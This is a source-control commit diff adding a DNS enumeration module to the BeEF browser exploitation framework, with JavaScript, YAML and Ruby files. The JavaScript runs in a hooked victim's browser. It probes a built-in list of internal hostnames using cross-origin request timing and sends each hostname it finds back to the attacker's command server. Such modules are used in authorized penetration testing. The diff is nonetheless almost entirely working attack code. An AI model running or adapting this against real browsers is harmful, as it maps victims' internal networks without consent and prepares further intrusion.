Add Module: DNS Enumeration. Fixes issue 528

git-svn-id: https://beef.googlecode.com/svn/trunk@1394 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-11-02 17:05:21 +00:00
parent edec211930
commit 0d61820a45
3 changed files with 127 additions and 0 deletions
--- a/modules/network/dns_enumeration/command.js
+++ b/modules/network/dns_enumeration/command.js
@@ -0,0 +1,65 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+    var dns_list = "<%= @dns_list %>";
+    var timeout = parseInt("<%= @timeout %>");
+
+    var cont=0; 
+    var port = 900;
+    var protocol="http://";
+    var hostnames;
+
+    if(dns_list!="%default%") {
+        hostnames = dns_list.split(","); 
+    } else {
+        hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "pub", "public", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webserver", "website", "win", "windows", "ww", "www", "xml");
+    }
+    
+    function notify() {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]);
+        check_next();
+    }
+    
+    function check_next() { 
+        cont++;
+        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port); 
+        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); 
+    }
+
+    function do_resolv(url) {
+        // Cross Origin Resource Sharing call
+        var xhr = new XMLHttpRequest();
+        if("withCredentials" in xhr) {
+            xhr.open("GET", url, true);
+        } else if(typeof XDomainRequest != "undefined") {
+            xhr = new XDomainRequest();
+            xhr.open("GET",url);
+        } else {
+            return -1;
+        }
+        
+        xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } };
+        xhr.send();
+        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000);
+    }
+
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded');
+    if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); 
+    }
+
+});
--- a/modules/network/dns_enumeration/config.yaml
+++ b/modules/network/dns_enumeration/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        dns_enumeration:
+            enable: true
+            category: "Network"
+            name: "DNS Enumeration"
+            description: "Discover DNS hostnames within the vicitim's network using dictionary and timming attacks."
+            authors: ["jgaliana"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["O"]
--- a/modules/network/dns_enumeration/module.rb
+++ b/modules/network/dns_enumeration/module.rb
@@ -0,0 +1,36 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+#
+# DNS Enumeration
+
+class Dns_enumeration < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name' => 'dns_list', 'ui_label' => 'DNS (coma separated)', 'value' => '%default%'},
+        {'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '4000'}
+    ]
+  end
+  
+  def post_execute
+    content = {}
+    content['result'] =@datastore['result'] if not @datastore['result'].nil?
+    if content.empty?
+      content['fail'] = 'No DNS hosts have been discovered.'
+    end
+    save content
+  end
+end